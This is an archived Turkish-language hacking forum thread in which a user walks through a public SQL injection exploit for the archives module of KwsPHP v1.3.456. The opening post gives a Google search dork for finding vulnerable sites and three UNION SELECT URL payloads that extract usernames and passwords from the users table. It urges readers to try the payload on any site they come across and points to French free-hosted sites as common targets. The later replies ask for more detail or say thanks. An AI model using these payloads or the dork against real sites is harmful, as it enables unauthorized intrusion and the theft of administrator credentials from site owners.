PDA

Orijinalini görmek için tıklayınız

eXTReMe Tracker
: KwsPHP v1.3.456 (archives)SQL Injection


Turk-Krall
05-18-2008, 10:38 AM
Selamun Aleyküm milw0rmda verilen bu expoliti size anlatmaya çalışacağım

Google Arama Kodumuz : allinurl: "index.php?mod=archives"
sql enjektemiz :

1 ) index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,p ass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10,11, 12,13/**/from/**/users/*
2)
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,p ass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10/**/ from/**/users/*
3)
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,p ass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10,11, 12,13,14/**/from/**/users/*

BAkalım Ne İşe Yarıyormuş bu sql..

Öncelikle Önüze Gelen Sitelerin Sonunda Bu Kodu deniyoruz

sonra önümüze tablo gelecek
Description : die bir yazı çıkacak
şimdi bunu anlatayım :

bunda size admin nivk ve şifresini veriri

yani

adminnameass die

kolay gelsin ha bu arada bu free fr sitelerinde yani fransa sitelerinde daha çok vardır bilginize!

AsiMawi
06-01-2008, 06:18 PM
AÇik Anlatsan Bİraz

MusT-i
06-01-2008, 06:39 PM
teşekkürler

MoKoKoCuEmrE
06-05-2008, 12:32 PM
AÇik Anlatsan Bİraz

ewetT